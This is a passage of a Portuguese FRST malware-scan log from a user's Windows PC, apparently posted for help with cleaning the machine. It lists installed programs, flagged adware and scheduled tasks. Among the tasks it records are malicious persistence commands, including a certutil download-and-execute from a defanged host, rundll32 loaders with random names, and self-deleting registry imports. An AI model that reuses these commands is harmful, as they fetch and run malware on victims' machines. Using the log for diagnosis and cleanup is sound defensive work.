Importação do SketchUp 2016-2017 (HKLM-x32\...\{063925DB-9D8C-48E2-8F04-1B7038B6C783}) (Version: 2.2.0 - Autodesk)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 9.17.10.2963 - Intel Corporation)
Intel(R) SDK for OpenCL - CPU Only Runtime Package (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: 2.0.0.37149 - Intel Corporation)
IPTInstaller (HKLM-x32\...\{08208143-777D-4A06-BB54-71BF0AD1BB70}) (Version: 4.0.9 - HTC)
IP-TV Player 0.28.1.8847 (HKLM-x32\...\IP-TV_Player) (Version: 0.28.1.8847 - ADSL Club Co Ltd)
IRPF2017 (HKLM-x32\...\IRPF2017) (Version: 1.1 - Receita Federal do Brasil)
IRPF2018 (HKLM-x32\...\IRPF2018) (Version: 1.4 - Receita Federal do Brasil)
Java 8 Update 171 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180171F0}) (Version: 8.0.1710.11 - Oracle Corporation)
Java(TM) SE Development Kit 9.0.1 (64-bit) (HKLM\...\{4AC8DBB2-1AE5-5156-83F9-D4E2E6DD564B}) (Version: 9.0.1.0 - Oracle Corporation)
K-Lite Mega Codec Pack 10.6.0 (HKLM-x32\...\KLiteCodecPack_is1) (Version: 10.6.0 - )
Manager (HKLM-x32\...\{38251B9A-C44B-42D9-9A6A-0697986E334A}) (Version: 4.1.4.27792 - 2015 pdfforge GmbH. All rights reserved) Hidden
Microsoft .NET Framework 4.6.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft .NET Framework 4.6.1 (Português do Brasil) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1046) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft Build Tools 2013 (HKLM-x32\...\{2bceccd3-6613-4596-b748-441a06847696}) (Version: 12.0.21005.1 - Microsoft Corporation)
Microsoft Build Tools 2015 (HKLM-x32\...\{d21da0dd-4ba4-4838-ba58-64cf7a77131a}) (Version: 14.0.23107.10 - Microsoft Corporation)
Microsoft Office Professional Plus 2013 (HKLM\...\Office15.PROPLUS) (Version: 15.0.4569.1506 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50901.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.10.25008 (HKLM-x32\...\{f1e7e313-06df-4c56-96a9-99fdfd149c51}) (Version: 14.10.25008.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.10.25008 (HKLM-x32\...\{c239cea1-d49e-4e16-8e87-8c055765f7ec}) (Version: 14.10.25008.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Visual Studio 2017 (HKLM-x32\...\{6F320B93-EE3C-4826-85E0-ADF79F8D4C61}) (Version: 1.10.30642.0 - Microsoft Corporation)
Mozilla Firefox 45.3.0 ESR (x86 pt-BR) (HKLM-x32\...\Mozilla Firefox 45.3.0 ESR (x86 pt-BR)) (Version: 45.3.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 45.3.0.6050 - Mozilla)
Nero 7 Essentials (HKLM-x32\...\{AAB93551-3FFE-42B2-8315-96252BBC1046}) (Version: 7.02.4861 - Nero AG)
NetBeans IDE 8.2 (HKLM\...\nbi-nb-base-8.2.0.0.201609300101) (Version: 8.2 - NetBeans.org)
Nik Collection (HKLM-x32\...\Nik Collection) (Version: 1.2.11 - Google)
One Click Root (HKLM-x32\...\{CE749480-2B6D-4E38-B3B0-D8644C7B0287}) (Version: 1.00.0188 - One Click Root)
Pacote de Idiomas do Microsoft Visual Studio 2010 Tools for Office Runtime (x64) - Português (Brasil) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64) Language Pack - PTB) (Version: 10.0.50903 - Microsoft Corporation)
PandaViewer (HKLM-x32\...\PandaViewer) (Version: - )
PC-CCID (HKLM\...\{3DCDFCDB-4D96-4CF0-9BB3-C91DAE9073F3}) (Version: 2.0.0 - Gemalto)
PDF Architect 4 (HKLM-x32\...\PDF Architect 4) (Version: 4.0.34.26215 - pdfforge GmbH)
PDF Architect 4 Create Module (HKLM\...\{72B9DF2C-76FA-40B5-A469-16EAB159CE72}) (Version: 4.1.5.29097 - pdfforge GmbH) Hidden
PDF Architect 4 Edit Module (HKLM\...\{BDF7326B-7ED4-4034-B867-F4E88D4E628B}) (Version: 4.1.5.29097 - pdfforge GmbH) Hidden
PDF Architect 4 View Module (HKLM\...\{03E04B47-9270-4613-8D7E-DA4AD2B259A0}) (Version: 4.1.5.29097 - pdfforge GmbH) Hidden
PDFCreator (HKLM\...\{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}) (Version: 2.3.0 - pdfforge GmbH)
PremierOpinion (HKLM-x32\...\{eeb86aef-4a5d-4b75-9d74-f16d438fc286}) (Version: 1.3.337.412 - VoiceFive, Inc.) <==== ATENÇÃO
QuickTime 7 (HKLM-x32\...\{FF59BD75-466A-4D5A-AD23-AAD87C5FD44C}) (Version: 7.79.80.95 - Apple Inc.)
Revisores de Texto do Microsoft Office 2013 – Português do Brasil (HKLM\...\{90150000-001F-0416-1000-0000000FF1CE}) (Version: 15.0.4569.1506 - Microsoft Corporation) Hidden
S Agent (HKLM\...\{F49C89E7-14AC-4796-9C6A-49FA97890857}) (Version: 1.1.53 - Samsung Electronics CO., LTD.) Hidden
SafeFinder (HKLM-x32\...\{8E7CEB13-71CD-4684-9CE7-D3D0760EA499}) (Version: 1.0.0.0 - Linkury) <==== ATENÇÃO
SafeSign 64-bits (HKLM\...\{2DF407D3-A8AD-4ACF-BFD5-5F7D42EC62FD}) (Version: 3.0.87 - A.E.T. Europe B.V.)
Samsung SCX-3200 Series (HKLM-x32\...\Samsung SCX-3200 Series) (Version: - Samsung Electronics Co., Ltd.)
Samsung Update (HKLM-x32\...\{00ABE05F-DB49-4421-AA35-833DD9A9A94D}) (Version: 2.2.12 - Samsung Electronics CO., LTD.)
Scan Assistant (HKLM-x32\...\{BF6CF460-40C3-49BA-800A-4B934B6498B1}) (Version: 1.01.014 - Samsung Electronics Co., Ltd.)
SearchAwesome (HKLM\...\5850f7899b7a00e77740675180ff5f97) (Version: 13.14.1.242 (i1.0) - SearchAwesome) <==== ATENÇÃO
SecureW2 EAP Suite 1.1.3 for Windows (HKLM-x32\...\SecureW2 EAP Suite) (Version: - )
Service Pack 1 for Microsoft Office 2013 (KB2850036) 64-Bit Edition (HKLM\...\{90150000-0011-0000-1000-0000000FF1CE}_Office15.PROPLUS_{D82063A8-7C8C-4C3B-A9BB-95138CA55D26}) (Version: - Microsoft)
Skype Click to Call (HKLM-x32\...\{873F8E7C-10E6-449F-BD7E-5FBA7C8E1C9B}) (Version: 8.5.0.9167 - Microsoft Corporation)
Skype™ 7.40 (HKLM-x32\...\{3B7E914A-93D5-4A29-92BB-AF8C3F66C431}) (Version: 7.40.103 - Skype Technologies S.A.)
Speedycar version 1.0 (HKLM-x32\...\Speedycar_is1) (Version: 1.0 - MAL) <==== ATENÇÃO
Suporte para Aplicativos Apple (32-bit) (HKLM-x32\...\{7FA9ECCF-A2DE-4DA1-BFF3-81260DBDA68F}) (Version: 4.1.2 - Apple Inc.)
Suporte para Aplicativos Apple Apple (64-bit) (HKLM\...\{691F30EB-9009-475A-B8A9-E1BF39598FD5}) (Version: 4.1.2 - Apple Inc.)
TDM-GCC (HKLM-x32\...\TDM-GCC) (Version: 1.1309.0 - TDM)
Uninstall Samsung Printer Software (HKLM-x32\...\TotalUninstaller) (Version: 4.0.0.13 - Samsung Electronics CO., LTD.)
Unity (HKLM-x32\...\Unity) (Version: 5.6.2f1 - Unity Technologies ApS)
Universal Adb Driver (HKLM-x32\...\{D9C4202E-6D51-4B06-A8F1-22316E654BCA}) (Version: 1.0.0 - ClockworkMod)
Update for Skype for Business 2015 (KB3039776) 64-Bit Edition (HKLM\...\{90150000-012B-0416-1000-0000000FF1CE}_Office15.PROPLUS_{2BA6245D-FBB9-42F6-AFD9-C0DC52763AD5}) (Version: - Microsoft)
vs_communitymsi (HKLM-x32\...\{A041943F-C97B-48F6-8F23-C5078F99BB3A}) (Version: 15.0.26323 - Microsoft Corporation) Hidden
vs_communitymsires (HKLM-x32\...\{8DE51F5A-10B0-4697-89AC-A53AAFF4F02B}) (Version: 15.0.26228 - Microsoft Corporation) Hidden
vs_devenvmsi (HKLM-x32\...\{581E5656-26E2-4A02-9711-48C8E4998310}) (Version: 15.0.26208 - Microsoft Corporation) Hidden
vs_filehandler_amd64 (HKLM-x32\...\{15D591B0-7B40-4957-B6C0-EB7452B5AAB6}) (Version: 15.0.26228 - Microsoft Corporation) Hidden
vs_filehandler_x86 (HKLM-x32\...\{DC296244-0701-4EDE-9696-05B9C1D017B3}) (Version: 15.0.26228 - Microsoft Corporation) Hidden
vs_FileTracker_Singleton (HKLM-x32\...\{11230C85-1813-4BC3-9C24-E0B74B59653E}) (Version: 15.0.26208 - Microsoft Corporation) Hidden
vs_minshellinteropmsi (HKLM-x32\...\{9477F337-FD16-4ACA-8217-E2D7A0F92603}) (Version: 15.0.26301 - Microsoft Corporation) Hidden
vs_minshellmsi (HKLM-x32\...\{497A5ACE-DA03-4412-A110-910B2C450720}) (Version: 15.0.26424 - Microsoft Corporation) Hidden
vs_minshellmsires (HKLM-x32\...\{7B433884-CBD8-4DDB-9B61-06439DDBD774}) (Version: 15.0.26228 - Microsoft Corporation) Hidden
Warsaw 2.4.2.1 64 bits (HKLM\...\{20E60725-16C8-4FB9-8BC2-AF92C5F8D06D}_is1) (Version: 2.4.2.1 - GAS Tecnologia)
Weather Lite 2.0.1.5000183 (HKLM\...\WeatherTool) (Version: 2.0.1.5000183 - ShenZhen Qianhailewang Technology Co,.Ltd)
Web Signer (HKLM-x32\...\{4D8BF29F-F66B-55FD-2BBF-D536A5BFA91F}) (Version: 2.3.1.22178 - Softplan Sistemas)
WhiteClick (HKLM-x32\...\{D66F6F24-652D-4405-A0D3-C568F825FE66}) (Version: 1.0.2 - AITI LODZHYK, TOV)
WinRAR 5.40 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.40.0 - win.rar GmbH)
YoutubeAdBlock (HKLM-x32\...\E3605470-291B-44EB-8648-745EE356599A) (Version: 2.0.0.548 - Company Inc.) <==== ATENÇÃO

==================== Exame Personalizado CLSID (Whitelisted): ==========================

(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)

CustomCLSID: HKU\S-1-5-21-1322778411-14668823-402750941-1000_Classes\CLSID\{0783EB25-59F8-4F02-B6B0-F1D4349F0007}\InprocServer32 -> C:\Users\Alessandra\AppData\Local\GAS Tecnologia\GBBD\npsf_cef_64.dll (GAS Tecnologia)
CustomCLSID: HKU\S-1-5-21-1322778411-14668823-402750941-1000_Classes\CLSID\{0783EB25-59F8-4F02-B6B1-F1D4349F0007}\InprocServer32 -> C:\Users\Alessandra\AppData\Local\GAS Tecnologia\GBBD\npsf_cef_64.dll (GAS Tecnologia)
CustomCLSID: HKU\S-1-5-21-1322778411-14668823-402750941-1000_Classes\CLSID\{0D327DA6-B4DF-4842-B833-2CFF84F0948F}\localserver32 -> C:\Program Files\Autodesk\AutoCAD 2017\acad.exe (Autodesk, Inc.)
CustomCLSID: HKU\S-1-5-21-1322778411-14668823-402750941-1000_Classes\CLSID\{720DB9AF-D62C-4ED0-A377-429C22312852}\localserver32 -> C:\Program Files\Autodesk\AutoCAD 2017\acad.exe (Autodesk, Inc.)
CustomCLSID: HKU\S-1-5-21-1322778411-14668823-402750941-1000_Classes\CLSID\{E2C40589-DE61-11ce-BAE0-0020AF6D7005}\InprocServer32 -> C:\Program Files\Autodesk\AutoCAD 2017\en-US\acadficn.dll (Autodesk, Inc.)
CustomCLSID: HKU\S-1-5-21-1322778411-14668823-402750941-1000_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Systems)
ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] ()
ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] ()
ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] ()
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Nenhum Arquivo
ShellIconOverlayIdentifiers: [AutoCAD Digital Signatures Icon Overlay Handler] -> {36A21736-36C2-4C11-8ACB-D4136F2B57BD} => C:\Windows\system32\AcSignIcon.dll [2016-02-07] (Autodesk, Inc.)
ShellIconOverlayIdentifiers: [EldosIconOverlay] -> {5BB532A2-BF14-4CCC-86B7-71B81EF6F8BC} => C:\Windows\system32\CbFsMntNtf3.dll [2012-04-09] (EldoS Corporation)
ShellIconOverlayIdentifiers: [{BFD98515-CD74-48A4-98E2-13D209E3EE4F}] -> {BFD98515-CD74-48A4-98E2-13D209E3EE4F} => C:\Windows\system32\mcicda64.dll [2018-03-24] ()
ShellIconOverlayIdentifiers-x32: [EldosIconOverlay] -> {5BB532A2-BF14-4CCC-86B7-71B81EF6F8BC} => C:\Windows\system32\CbFsMntNtf3.dll [2012-04-09] (EldoS Corporation)
ContextMenuHandlers1: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] ()
ContextMenuHandlers1: [AcShellExtension.AcContextMenuHandler] -> {2E7A2C6C-B938-40a4-BA1C-C7EC982DC202} => C:\Program Files\Common Files\Autodesk Shared\AcShellEx\AcShellExtension.dll [2016-02-07] (Autodesk)
ContextMenuHandlers1: [PDFArchitect4_ManagerExt] -> {3AECFCB3-8472-48E9-BC7B-5A3CD945C886} => C:\Program Files\PDF Architect 4\creator-context-menu.dll [2016-08-05] (pdfforge GmbH)
ContextMenuHandlers1: [PDFCreator.ShellContextMenu] -> {d9cea52e-100d-4159-89ea-76e845bc13e1} => C:\Windows\system32\mscoree.dll [2010-11-04] (Microsoft Corporation)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-08-15] (Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-08-15] (Alexander Roshal)
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2013-01-16] (Intel Corporation)
ContextMenuHandlers6: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-10-25] ()
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2016-08-15] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2016-08-15] (Alexander Roshal)

==================== Tarefas Agendadas (Whitelisted) =============

(Se uma entrada for incluída na fixlist, será removida do Registro. O arquivo não será movido, a menos que seja colocado separadamente.)

Task: {0447AF66-1E42-4B9D-B8B5-68BCF1E4383C} - System32\Tasks\psv_Donfresh => cmd.exe /c regedit.exe /s "C:\ProgramData\Kipolam\Daltzap.reg" & del "C:\ProgramData\Kipolam\Daltzap.reg" & SCHTASKS /Delete /TN "psv_Donfresh" /F <==== ATENÇÃO
Task: {0F9B2844-2E52-4C1D-A300-0B09414D732D} - System32\Tasks\HPCustParticipation HP Deskjet 2050 J510 series => C:\Program Files\HP\HP Deskjet 2050 J510 series\Bin\HPCustPartic.exe [2012-10-02] (Hewlett-Packard Co.)
Task: {150B32F0-AE41-4FE8-99F3-19B9C16A2BFE} - System32\Tasks\HPCeeScheduleForAlessandra => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2015-06-16] (Hewlett-Packard)
Task: {170488B0-BEF0-4CFE-A5A1-3B4ADAB6E1B4} - System32\Tasks\SUPatchForW10Up => C:\ProgramData\Samsung\SamsungUpdatePatch\SUPatchForW10Up.exe [2015-08-18] (Samsung Electronics CO., LTD.)
Task: {1ABEEBC4-8F8E-4312-B923-14403EEF87E1} - System32\Tasks\SAgent => C:\Program Files\Samsung\S Agent\CommonAgent.exe [2015-07-01] (Samsung Electronics CO., LTD.)
Task: {1B045A8B-90D6-415F-946A-C1A6C814199C} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe [2017-06-22] (HP Inc.)
Task: {39278C0C-08E4-41F4-8965-77060F40FE0F} - System32\Tasks\{03632583-1770-4CCC-8DE9-B284E2B7FBF6} => C:\Windows\system32\pcalua.exe -a C:\Users\Alessandra\Downloads\iGBPCEFwr.exe -d C:\Users\Alessandra\Downloads
Task: {3C3C9B9F-D544-418C-9793-0579CB90CBE1} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2018-02-09] (Adobe Systems Incorporated)
Task: {44FB4653-46A8-47FE-9FCF-51C733706461} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2018-05-04] (HP Inc.)
Task: {48A5DFB7-8B29-46B4-8437-90D94F9D909A} - System32\Tasks\{D53495F2-4971-42D6-820C-CAFE38FB5679} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\Lavasoft\Web Companion\Application\WebCompanionInstaller.exe" -c --uninstall
Task: {497364D6-DFC7-4C5C-A89D-3AE3A0C0197A} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office\Office15\msoia.exe [2014-01-23] (Microsoft Corporation)
Task: {504ACFD9-3672-41E4-AC3E-FB1D499B6D78} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office\Office15\msoia.exe [2014-01-23] (Microsoft Corporation)
Task: {59109EF6-2D9A-4C8D-9583-68EE313C63CB} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2018-06-05] () <==== ATENÇÃO
Task: {5D78EE72-CDB6-4C3C-B418-CBCF5D79A6F8} - System32\Tasks\{71CF92AC-5A7E-41CC-AF40-85EB5AADAB3B} => C:\Windows\system32\pcalua.exe -a C:\Users\Alessandra\Downloads\jxpiinstall(3).exe -d C:\Users\Alessandra\Downloads
Task: {688AF2BE-283D-4C97-A9DF-EFF2BDF32296} - System32\Tasks\psv_Sumtough => cmd.exe /c regedit.exe /s "C:\ProgramData\Kipolam\Kontouch.reg" & del "C:\ProgramData\Kipolam\Kontouch.reg" & SCHTASKS /Delete /TN "psv_Sumtough" /F <==== ATENÇÃO
Task: {71DBB70E-3A59-4444-9B75-98FE5A4607AA} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2018-05-04] (HP Inc.)
Task: {76360668-09E3-4423-8586-E27FECFBC6BB} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-12-18] (Google Inc.)
Task: {78A08168-363C-45E2-8F18-5BACA73A8F1E} - System32\Tasks\rArHIXNWKfbeRtR2 => rundll32 "C:\Program Files (x86)\EgDGbQEiU\LudWWx.dll",#1
Task: {8A0C96B2-5EEF-41B4-8717-76347F43EEE7} - System32\Tasks\{D9E77BE1-6B7C-88AD-F011-BB3053FAFBC7} => C:\Users\Alessandra\VAxueQ.exe [1601-01-03] (Microsoft Corporation)
Task: {8E3C940E-2078-4126-B942-6E4F5E98D5E9} - System32\Tasks\psv_SaoLex => cmd.exe /c regedit.exe /s "C:\ProgramData\Kipolam\Concom.reg" & del "C:\ProgramData\Kipolam\Concom.reg" & SCHTASKS /Delete /TN "psv_SaoLex" /F <==== ATENÇÃO
Task: {98A092FD-2BD3-4738-87C3-F14B00B00BC6} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe [2014-01-23] (Microsoft Corporation)
Task: {9A1D7602-FDBE-42FE-9963-34F3023D5351} - System32\Tasks\{97FB065C-8365-8037-2DFF-FC795566A9AC} => C:\Program Files (x86)\Common Files\EeTooio.exe [1601-01-03] (Microsoft Corporation)
Task: {AB8FFAFE-BAB0-407C-9BB0-B44F1B7CA165} - System32\Tasks\{9347C7B1-634C-4A97-97D8-1311460842B3} => C:\Windows\system32\pcalua.exe -a C:\Users\Alessandra\Downloads\JavaSetup8u71(3).exe -d C:\Users\Alessandra\Downloads
Task: {B11BCB1D-A1D3-4D99-81B7-657B4B0171C0} - System32\Tasks\Hewlett-Packard\HP Active Health\HP Active Health Scan (HPSA) => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPActiveHealth\ActiveHealth.exe [2017-11-16] ()
Task: {B92E2E30-0528-4172-9905-9F78B98E7134} - System32\Tasks\psv_Goodlex => cmd.exe /c regedit.exe /s "C:\ProgramData\Kipolam\Medfax.reg" & del "C:\ProgramData\Kipolam\Medfax.reg" & SCHTASKS /Delete /TN "psv_Goodlex" /F <==== ATENÇÃO
Task: {BC46DF61-2BDB-48B7-87FD-9E25BB3ECA70} - System32\Tasks\KnPQHVchzdGfrlHaz2 => rundll32 "C:\Program Files (x86)\OxoywZINBbQwrioRGrR\wvmrCDl.dll",#1
Task: {BD932F81-80E5-476E-A8ED-8B240C83E3E6} - System32\Tasks\XLqsfoKFUKuTqG => rundll32 "C:\Program Files (x86)\ijcQGTqqPStU2\oLSurdeWTWdxJ.dll",#1
Task: {CA2F5F1E-B67D-4475-BC4D-E9891A14244E} - System32\Tasks\FastDataX Task => C:\Program Files (x86)\FastDataX\FastDataX.exe [2018-05-30] () <==== ATENÇÃO
Task: {CB52A8F3-56DF-4EF1-B6C2-5965E26761FD} - System32\Tasks\WobUIKhuMtTTi2 => C:\Windows\system32\wscript.exe "C:\ProgramData\XjOPTLXDzAynQaVB\GSuArkt.wsf"
Task: {CB815659-E361-428C-AFA8-AC37DD20F8B5} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2017-09-20] (HP Inc.)
Task: {CF7A2880-4D4E-464E-AC96-23D8F23D87FC} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://newscommer.com/app/app.exe C:\Users\Alessandra\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Alessandra\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATENÇÃO
Task: {E518EA10-6D1E-42F2-BFBE-A7BC78A10593} - System32\Tasks\AdobeGCInvoker-1.0-Alessandra-PC-Alessandra => C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGCInvokerUtility.exe [2018-05-11] (Adobe Systems, Incorporated)
Task: {EA709C1C-EDA1-4069-8905-106F4BACD9CE} - System32\Tasks\{0D4CA19C-26EE-4381-B4F0-441C292A1025} => C:\Windows\system32\pcalua.exe -a C:\Users\Alessandra\Downloads\JavaSetup8u71(1).exe -d C:\Users\Alessandra\Downloads
Task: {EC0BCB80-FE1E-47A7-A511-CD424230F83D} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Product Configurator => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\ProductConfig.exe [2018-05-11] (HP Inc.)
Task: {EF156915-3036-4BFB-B817-69B801429648} - System32\Tasks\TdqeVjasHzsikvrWtEm2 => rundll32 "C:\Program Files (x86)\wCCFxMJCsZmzC\BQOQRHL.dll",#1
Task: {FBE0FDAB-73A7-4FD8-A64B-98E76035474C} - System32\Tasks\AVAST Software\Avast settings backup => C:\Program Files\Common Files\AV\avast! Antivirus\backup.exe [2018-02-03] (AVAST Software)
Task: {FDC7E735-D275-4C8A-9C9E-8370E94F7724} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-12-18] (Google Inc.)

(Se uma entrada for incluída na fixlist, o arquivo da tarefa (.job) será movido. O arquivo que está sendo executado pela tarefa não será movido.)

Task: C:\Windows\Tasks\HPCeeScheduleForAlessandra.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe

==================== Atalhos & WMI ========================

(As entradas podem ser listadas para serem restauradas ou removidas.)


ShortcutWithArgument: C:\Users\Alessandra\Desktop\Internet Explorer.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
ShortcutWithArgument: C:\Users\Alessandra\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> %SNP% --disable-quic
ShortcutWithArgument: C:\Users\Alessandra\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> %SNP%
ShortcutWithArgument: C:\Users\Alessandra\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> %SNP% --disable-quic
ShortcutWithArgument: C:\Users\Alessandra\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk -> C:\Program Files (x86)\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> %SNF%
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> %SNP% --disable-quic
